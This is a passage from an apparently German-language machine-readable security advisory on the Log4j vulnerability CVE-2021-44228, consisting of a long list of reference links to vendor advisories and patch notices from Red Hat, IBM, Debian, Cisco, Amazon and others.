vom 2021-12-11", "url": "https://www.vmware.com/security/advisories/VMSA-2021-0028.html" }, { "category": "external", "summary": "FortiGuard Labs PSIRT Advisory FG-IR-21-245 vom 2021-12-12", "url": "https://www.fortiguard.com/psirt/FG-IR-21-245" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2021-003 vom 2021-12-11", "url": "https://alas.aws.amazon.com/AL2022/ALAS-2021-003.html" }, { "category": "external", "summary": "IBM Security Bulletin 6525706 vom 2021-12-13", "url": 
"https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-websphere-application-server-cve-2021-44228/" }, { "category": "external", "summary": "Debian Security Advisory DLA-2842 vom 2021-12-12", "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html" }, { "category": "external", "summary": "Cisco Security Advisory CISCO-SA-APACHE-LOG4J-QRUKNEBD vom 2021-12-10", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "category": "external", "summary": "HCL Article KB0095493 vom 2021-12-13", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095493" }, { "category": "external", "summary": "Symantec Security Advisory SYMSA19793 vom 2021-12-13", "url": "https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793" }, { "category": "external", "summary": "Debian Security Advisory DSA-5020 vom 2021-12-12", "url": "http://www.debian.org/security/2021/dsa-5020" }, { "category": "external", "summary": "F-Secure Policy Manager Update vom 2021-12-12", "url": "https://status.f-secure.com/incidents/sk8vmr0h34pd" }, { "category": "external", "summary": "RSA SecurID Authentication Manager Update vom 2021-12-12", "url": "https://community.rsa.com/t5/general-security-advisories-and/rsa-customer-advisory-apache-vulnerability-log4j2-cve-2021-44228/ta-p/660501" }, { "category": "external", "summary": "Splunk Security Advisory vom 2021-12-12", "url": "https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html" }, { "category": "external", "summary": "Red Hat Security Bulletin RHSB-2021-009 vom 2021-12-13", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "Apache Kafka Mailing List vom 2021-12-12", "url": 
"https://lists.apache.org/thread/lgbtvvmy68p0059yoyn9qxzosdmx4jdv" }, { "category": "external", "summary": "Apache Struts Security Advice vom 2021-12-12", "url": "https://struts.apache.org/announce-2021#a20211212-2" }, { "category": "external", "summary": "Oracle Security Alert", "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html" }, { "category": "external", "summary": "Spring.io Blog", "url": "https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot" }, { "category": "external", "summary": "SOS Job Scheduler Vulnerability Release", "url": "https://kb.sos-berlin.com/display/PKB/Vulnerability+Release+2.2.0" }, { "category": "external", "summary": "SOS Job Scheduler Vulnerability Release", "url": "https://kb.sos-berlin.com/display/PKB/Vulnerability+Release+1.13.10" }, { "category": "external", "summary": "SAS Statement Regarding Remote Code Execution Vulnerability (CVE-2021-44228)", "url": "https://support.sas.com/content/support/en/security-bulletins/remote-code-execution-vulnerability-cve-2021-44228.html" }, { "category": "external", "summary": "Sammlung betroffener Produkte auf GitHub (NLD Nationaal Cyber Security Centrum)", "url": "https://github.com/NCSC-NL/log4shell/tree/main/software" }, { "category": "external", "summary": "Talos Intelligence Blog", "url": "https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html" }, { "category": "external", "summary": "Github User \"CronUp\"", "url": "https://github.com/CronUp/Malware-IOCs/blob/main/2021-12-11_Log4Shell_Botnets" }, { "category": "external", "summary": "Atlassian FAQ for CVE-2021-44228 vom 2021-12-12", "url": "https://confluence.atlassian.com/kb/faq-for-cve-2021-44228-1103069406.html" }, { "category": "external", "summary": "Siemens Security Advisory SSA-661247 vom 2021-12-13", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf" }, { "category": "external", "summary": "Unify Security Advisory Report OBSO-2112-01 vom 2021-12-13", 
"url": "https://networks.unify.com/security/advisories/OBSO-2112-01.pdf" }, { "category": "external", "summary": "Juniper Security Advisory JSA11259 vom 2021-12-13", "url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA11259\u0026cat=SIRT_1" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5094 vom 2021-12-14", "url": "https://access.redhat.com/errata/RHSA-2021:5094" }, { "category": "external", "summary": "Ubuntu Security Notice USN-5192-1 vom 2021-12-14", "url": "https://ubuntu.com/security/notices/USN-5192-1" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5140 vom 2021-12-15", "url": "https://access.redhat.com/errata/RHSA-2021:5140" }, { "category": "external", "summary": "IBM Security Bulletin 6526174 vom 2021-12-15", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-access-manager-9-0-7-1-and-ibm-security-verify-access-10-0-0-0-may-be-affected-by-the-log4j-vulnerability-cve-2021-44228-2/" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5137 vom 2021-12-15", "url": "https://access.redhat.com/errata/RHSA-2021:5137" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5138 vom 2021-12-15", "url": "https://access.redhat.com/errata/RHSA-2021:5138" }, { "category": "external", "summary": "WIBU Security Advisory WIBU-211213-01 vom 2021-12-15", "url": "https://cdn.wibu.com/fileadmin/wibu_downloads/security_advisories/Advisory_WIBU-211213-01.pdf" }, { "category": "external", "summary": "IBM Security Bulletin 6526274 vom 2021-12-15", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-blockchain-bridge-dependencies-are-vulnerable-to-an-issue-in-apache-log4j-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6526174 vom 2021-12-14", "url": 
"https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-access-manager-9-0-7-1-and-ibm-security-verify-access-10-0-0-0-may-be-affected-by-the-log4j-vulnerability-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6526182 vom 2021-12-14", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4shell-vulnerability-affects-ibm-spss-statistics-cve-2021-44228/" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5093 vom 2021-12-14", "url": "https://access.redhat.com/errata/RHSA-2021:5093" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5108 vom 2021-12-14", "url": "https://access.redhat.com/errata/RHSA-2021:5108" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5126 vom 2021-12-14", "url": "https://access.redhat.com/errata/RHSA-2021:5126" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5129 vom 2021-12-14", "url": "https://access.redhat.com/errata/RHSA-2021:5129" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5132 vom 2021-12-15", "url": "https://access.redhat.com/errata/RHSA-2021:5132" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5127 vom 2021-12-14", "url": "https://access.redhat.com/errata/RHSA-2021:5127" }, { "category": "external", "summary": "QNAP Security Advisory QSA-21-58 vom 2021-12-14", "url": "https://www.qnap.com/de-de/security-advisory/QSA-21-58" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5128 vom 2021-12-14", "url": "https://access.redhat.com/errata/RHSA-2021:5128" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5130 vom 2021-12-14", "url": "https://access.redhat.com/errata/RHSA-2021:5130" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5133 vom 2021-12-15", "url": "https://access.redhat.com/errata/RHSA-2021:5133" }, { "category": "external", 
"summary": "IBM Security Bulletin 6526184 vom 2021-12-14", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4shell-vulnerability-affects-ibm-spss-statistics-subscription-cve-2021-44228/" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5134 vom 2021-12-15", "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "external", "summary": "Apache log4j Security Advisory vom 2021-12-14", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "IBM Security Bulletin 6527090 vom 2021-12-16", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-plus-container-backup-and-restore-for-kubernetes-and-openshift-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527084 vom 2021-12-16", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-operations-center-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527088 vom 2021-12-16", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-security-access-manager-for-enterprise-single-sign-on-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6526640 vom 2021-12-15", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4j-as-used-in-ibm-qradar-user-behavior-analytics-application-add-on-to-ibm-qradar-siem-is-vulnerable-to-remote-code-execution-rce-cve-2021-44228/" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5148 vom 2021-12-16", "url": "https://access.redhat.com/errata/RHSA-2021:5148" }, { "category": "external", "summary": "HCL Article KB0095516 vom 2021-12-16", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095516" }, { "category": "external", "summary": "IBM Security Bulletin 6526490 vom 2021-12-16", 
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-has-been-identified-in-websphere-application-server-shipped-with-ibm-websphere-remote-server-cve-2021-44228/" }, { "category": "external", "summary": "Ubuntu Security Notice USN-5197-1 vom 2021-12-15", "url": "https://ubuntu.com/security/notices/USN-5197-1" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2021:4097-1 vom 2021-12-15", "url": "https://lists.suse.com/pipermail/sle-security-updates/2021-December/009912.html" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5106 vom 2021-12-16", "url": "https://access.redhat.com/errata/RHSA-2021:5106" }, { "category": "external", "summary": "IBM Security Bulletin 6526462 vom 2021-12-16", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-some-features-of-ibm-db2-cve-2021-44228/" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2021:4096-1 vom 2021-12-15", "url": "https://lists.suse.com/pipermail/sle-security-updates/2021-December/009911.html" }, { "category": "external", "summary": "SAP Support Center", "url": "https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf" }, { "category": "external", "summary": "IBM Security Bulletin 6527080 vom 2021-12-16", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-client-web-user-interface-and-ibm-spectrum-protect-for-virtual-environments-cve-2021-44228/" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2021-1730 vom 2021-12-16", "url": "https://alas.aws.amazon.com/AL2/ALAS-2021-1730.html" }, { "category": "external", "summary": "IBM Security Bulletin 6527082 vom 2021-12-16", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-vulnerable-to-a-remote-code-execution-vulnerability-in-log4j2-component/" }, { "category": 
"external", "summary": "Debian Security Advisory DSA-5022 vom 2021-12-16", "url": "https://lists.debian.org/debian-security-announce/2021/msg00208.html" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5107 vom 2021-12-16", "url": "https://access.redhat.com/errata/RHSA-2021:5107" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5141 vom 2021-12-16", "url": "https://access.redhat.com/errata/RHSA-2021:5141" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5186 vom 2021-12-17", "url": "https://access.redhat.com/errata/RHSA-2021:5186" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5183 vom 2021-12-17", "url": "https://access.redhat.com/errata/RHSA-2021:5183" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2021:5184 vom 2021-12-17", "url": "https://access.redhat.com/errata/RHSA-2021:5184" }, { "category": "external", "summary": "Siemens Security Advisory SSA-714170 vom 2021-12-16", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf" }, { "category": "external", "summary": "IBM Security Bulletin 6527372 vom 2021-12-17", "url": "https://www.ibm.com/support/pages/node/6527372" }, { "category": "external", "summary": "Atlassian Security Advisory - Log4j", "url": "https://confluence.atlassian.com/security/multiple-products-security-advisory-log4j-vulnerable-to-remote-code-execution-cve-2021-44228-1103069934.html" }, { "category": "external", "summary": "IBM Security Bulletin 6527226 vom 2021-12-17", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-some-features-of-ibm-db2-on-openshift-and-ibm-db2-and-db2-warehouse-on-cloud-pak-for-data-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527322 vom 2021-12-17", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-db2-warehouse-cve-2021-44228/" }, { 
"category": "external", "summary": "IBM Security Bulletin 6527096 vom 2021-12-17", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4jshell-vulnerability-affects-ibm-spss-modeler-cve-2021-44228/" }, { "category": "external", "summary": "Hitachi Vulnerability Information HITACHI-SEC-2021-147 vom 2021-12-17", "url": "https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2021-147/index.html" }, { "category": "external", "summary": "Palo Alto Networks Security Advisory PAN-184592 vom 2021-12-17", "url": "https://security.paloaltonetworks.com/CVE-2021-44228" }, { "category": "external", "summary": "Log4j Vulnerabilities Impact On Oracle E-Business Suite Analysis", "url": "https://www.integrigy.com/security-resources/log4j-vulnerabilities-impact-oracle-e-business-suite-analysis" }, { "category": "external", "summary": "Tibco Apache Log4J Vulnerability Daily Update", "url": "https://www.tibco.com/support/notices/2021/12/apache-log4j-vulnerability-update-archive-6" }, { "category": "external", "summary": "Avaya Product Security Apache Log4J Vulnerability vom 2021-12-17", "url": "https://support.avaya.com/helpcenter/getGenericDetails?detailId=1399839287609" }, { "category": "external", "summary": "IBM Security Bulletin 6527260 vom 2021-12-20", "url": "http://www.auscert.org.au/bulletins/ESB-2021.4320" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2021-1731 vom 2021-12-18", "url": "https://alas.aws.amazon.com/AL2/ALAS-2021-1731.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2021-1553 vom 2021-12-18", "url": "https://alas.aws.amazon.com/ALAS-2021-1553.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALASCORRETTO8-2021-001 vom 2021-12-20", "url": "https://alas.aws.amazon.com/AL2/ALASCORRETTO8-2021-001.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALASJAVA-OPENJDK11-2021-001 vom 2021-12-20", "url": 
"https://alas.aws.amazon.com/AL2/ALASJAVA-OPENJDK11-2021-001.html" }, { "category": "external", "summary": "Citrix Security Advisory CTX335705 vom 2021-12-20", "url": "https://support.citrix.com/article/CTX335705" }, { "category": "external", "summary": "IBM Security Bulletin 6527724 vom 2021-12-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-collaboration-and-deployment-services-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527824 vom 2021-12-17", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-for-space-management-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527824 vom 2021-12-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-for-space-management-cve-2021-44228-2/" }, { "category": "external", "summary": "IBM Security Bulletin 6527824 vom 2021-12-19", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-for-space-management-cve-2021-44228-3/" }, { "category": "external", "summary": "IBM Security Bulletin 6527894 vom 2021-12-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-for-vmware-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527874 vom 2021-12-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4shell-vulnerability-affects-ibm-spss-statistics-desktop-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527828 vom 2021-12-17", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-plus-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527894 vom 2021-12-19", "url": 
"https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-for-vmware-cve-2021-44228-2/" }, { "category": "external", "summary": "IBM Security Bulletin 6527836 vom 2021-12-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-on-windows-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527836 vom 2021-12-19", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-on-windows-cve-2021-44228-2/" }, { "category": "external", "summary": "IBM Security Bulletin 6527962 vom 2021-12-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerablity-in-apache-log4j-may-affect-ibm-tivoli-monitoring-installed-websphere-application-server-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6528108 vom 2021-12-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-scale-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527762 vom 2021-12-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spss-analytic-server-cve-2021-44228/" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2021-004 vom 2021-12-18", "url": "https://alas.aws.amazon.com/AL2022/ALAS-2021-004.html" }, { "category": "external", "summary": "HCL Article KB0095587 vom 2021-12-17", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095587" }, { "category": "external", "summary": "Ubuntu Security Notice USN-5192-2 vom 2021-12-17", "url": "https://ubuntu.com/security/notices/USN-5192-2" }, { "category": "external", "summary": "IBM Security Bulletin 6527768 vom 2021-12-18", "url": 
"https://www.ibm.com/blogs/psirt/security-bulletin-apache-log4j-vulnerability-affects-ibm-business-automation-workflow-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527924 vom 2021-12-17", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-blockchain-bridge-dependencies-are-vulnerable-to-an-issue-in-apache-log4j-cve-2021-45046/" }, { "category": "external", "summary": "NetApp Security Advisory NTAP-20211215-0001 vom 2021-12-20", "url": "https://security.netapp.com/advisory/ntap-20211215-0001/" }, { "category": "external", "summary": "IBM Security Bulletin 6528432 vom 2021-12-21", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-insights-is-vulnerable-to-a-remote-code-execution-vulnerability-in-apache-log4j-2-component-cve-2021-44228/" }, { "category": "external", "summary": "NetApp Security Advisory NTAP-20211210-0007 vom 2021-12-20", "url": "https://security.netapp.com/advisory/ntap-20211210-0007/" }, { "category": "external", "summary": "IBM Security Bulletin 6526420 vom 2021-12-22", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-websphere-service-registry-and-repository-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527764 vom 2021-12-22", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-identified-in-ibm-websphere-application-server-shipped-with-ibm-digital-business-automation-workflow-family-products-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6528846 vom 2021-12-22", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-tivoli-network-manager-ip-edition-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6528678 vom 2021-12-22", "url": 
"https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-some-features-of-ibm-db2-cve-2021-4104/" }, { "category": "external", "summary": "Incident Report for F-Secure services", "url": "https://status.f-secure.com/incidents/sk8vmr0h34pd" }, { "category": "external", "summary": "Apache Log4j 2 Release Notes", "url": "https://logging.apache.org/log4j/log4j-2.12.3/index.html" }, { "category": "external", "summary": "Apache Log4j2 Advisory", "url": "https://logging.apache.org/log4j/log4j-2.3.1/index.html" }, { "category": "external", "summary": "IBM Security Bulletin 6536868 vom 2021-12-23", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-apache-log4j-shipped-with-ibm-tivoli-netcool-omnibus-common-integration-libraries-cve-2021-4104-cve-2021-45046-cve-2021-44228/" }, { "category": "external", "summary": "HCL Article KB0095728 vom 2021-12-22", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095728" }, { "category": "external", "summary": "IBM Security Bulletin 6536712 vom 2021-12-23", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-informix-dynamic-server-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6527948 vom 2021-12-23", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-netcool-omnibus-8-1-cve-2021-44228/" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2021-1732 vom 2021-12-24", "url": "https://alas.aws.amazon.com/AL2/ALAS-2021-1732.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2021-1554 vom 2021-12-24", "url": "https://alas.aws.amazon.com/ALAS-2021-1554.html" }, { "category": "external", "summary": "Hitachi Vulnerability Information HITACHI-SEC-2021-315 vom 2021-12-28", "url": 
"https://www.hitachi.co.jp/products/it/storage-solutions/global/sec_info/2021/2021_315.html" }, { "category": "external", "summary": "EMC Security Advisory DSA-2021-274 vom 2022-01-09", "url": "https://www.dell.com/support/kbdoc/de-de/000194503/dsa-2021-274-dell-emc-data-domain-security-update-for-apache-log4j-remote-code-execution-vulnerability-cve-2021-44228" }, { "category": "external", "summary": "EMC Security Advisory DSA-2021-309 vom 2022-01-09", "url": "https://www.dell.com/support/kbdoc/de-de/000194651/dsa-2021-309-dell-emc-dpa-security-update-for-apache-log4j-remote-code-execution-vulnerability-cve-2021-44228" }, { "category": "external", "summary": "EMC Security Advisory DSA-2021-277 vom 2022-01-09", "url": "https://www.dell.com/support/kbdoc/de-de/000194480/dsa-2021-277-dell-emc-avamar-update-for-apache-log4j-remote-code-execution-vulnerability-cve-2021-44228" }, { "category": "external", "summary": "HPE Security Bulletin HPESBGN04215 rev.10 vom 2022-01-08", "url": "https://support.hpe.com/hpesc/public/docDisplay?elq_mid=17739\u0026elq_cid=67018031\u0026docId=hpesbgn04215en_us" }, { "category": "external", "summary": "IBM Security Bulletin 6539444 vom 2022-01-11", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-operational-decision-manager-cve-2021-44228/" }, { "category": "external", "summary": "SAP Security Note 3130521 vom 2022-01-11", "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:0082 vom 2022-01-11", "url": "https://access.redhat.com/errata/RHSA-2022:0082" }, { "category": "external", "summary": "JobScheduler Vulnerability Release 2.2.1 vom 2022-01-11", "url": "https://kb.sos-berlin.com/display/PKB/Vulnerability+Release+2.2.1" }, { "category": "external", "summary": "Juniper Security Bulletin JSA11287 vom 2022-01-12", "url": 
"https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA11287\u0026cat=SIRT_1" }, { "category": "external", "summary": "SoapUI Release 5.6.1", "url": "https://www.soapui.org/downloads/latest-release/release-history/" }, { "category": "external", "summary": "IBM Security Bulletin 6541008 vom 2022-01-15", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rational-build-forge-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228/" }, { "category": "external", "summary": "IBM Security Bulletin 6541258 vom 2022-01-18", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rational-software-architect-realtime-edition-rsa-rt-is-is-vulnerable-to-arbitrary-code-execution-and-denial-of-service-due-to-apache-log4j-cve-2021-44228-cve-2021-45046-and/" }, { "category": "external", "summary": "Unify Security Advisory Report OBSO-2201-01 vom 2022-01-18", "url": "https://networks.unify.com/security/advisories/OBSO-2201-01.pdf" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:0203 vom 2022-01-20", "url": "https://access.redhat.com/errata/RHSA-2022:0203" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:0216 vom 2022-01-20", "url": "https://access.redhat.com/errata/RHSA-2022:0216" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:0222 vom 2022-01-21", "url": "https://access.redhat.com/errata/RHSA-2022:0222" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:0205 vom 2022-01-20", "url": "https://access.redhat.com/errata/RHSA-2022:0205" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:0223 vom 2022-01-21", "url": "https://access.redhat.com/errata/RHSA-2022:0223" }, { "category": "external", "summary": "LibreOffice Security Advisory", "url": "https://www.libreoffice.org/about-us/security/advisories/cve-2021-44228/" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:0296 vom 
2022-01-26", "url": "https://access.redhat.com/errata/RHSA-2022:0296" }, { "category": "external", "summary": "ASC NEO Release Announcement 6.7 vom 2022-01-24", "url": "https://www.asc.de/partner/pp_Tech_d.php?Reveal_in_Tree=VW1Wc1pXRnpaU0JCYm01dmRXNWpaVzFsYm5RZ1ptOXlJRzVsYnlCVGRXbDBaU0JXTmk0M0lDd2dOVFEwSUd0Q0xDQXlNREl5TFRBeExUSTArSA==" }, { "category": "external", "summary": "IBM Security Bulletin 6553622 vom 2022-02-04", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-informix-dynamic-server-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228-3/" }, { "category": "external", "summary": "IBM Security Bulletin 6553626 vom 2022-02-04", "url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4j-vulnerability-cve-2021-44228-in-ibm-informix-dynamic-server-in-cloud-pak-for-data-2/" }, { "category": "external", "summary": "HCL Article KB0097471 vom 2022-05-18", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097471" }, { "category": "external", "summary": "HCL Article KB0097299 vom 2022-03-23", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097299" }, { "category": "external", "summary": "HCL Article KB0097470 vom 2022-03-25", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097470" }, { "category": "external", "summary": "HCL Article KB0096807 vom 2022-03-29", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0096807" }, { "category": "external", "summary": "HCL Article KB0097763 vom 2022-04-06", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097763" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:1296 vom 2022-04-11", "url": "https://access.redhat.com/errata/RHSA-2022:1296" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:1299 vom 2022-04-11", "url": "https://access.redhat.com/errata/RHSA-2022:1299" }, { 
"category": "external", "summary": "Red Hat Security Advisory RHSA-2022:1297 vom 2022-04-11", "url": "https://access.redhat.com/errata/RHSA-2022:1297" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2-2022-1773 vom 2022-04-19", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1773.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2022-1580 vom 2022-04-19", "url": "https://alas.aws.amazon.com/ALAS-2022-1580.html" }, { "category": "external", "summary": "HCL Article KB0097650 vom 2022-04-23", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097650" }, { "category": "external", "summary": "HCL Article KB0097639 vom 2022-04-23", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097639" }, { "category": "external", "summary": "AVAYA Security Advisory ASA-2022-001 vom 2022-04-25", "url": "https://downloads.avaya.com/css/P8/documents/101081576" }, { "category": "external", "summary": "HCL Article KB0097787 vom 2022-04-28", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097787" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2022-1806 vom 2022-06-15", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1806.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2022-1601 vom 2022-06-15", "url": "https://alas.aws.amazon.com/ALAS-2022-1601.html" }, { "category": "external", "summary": "IBM Security Bulletin 6602955 vom 2022-07-13", "url": 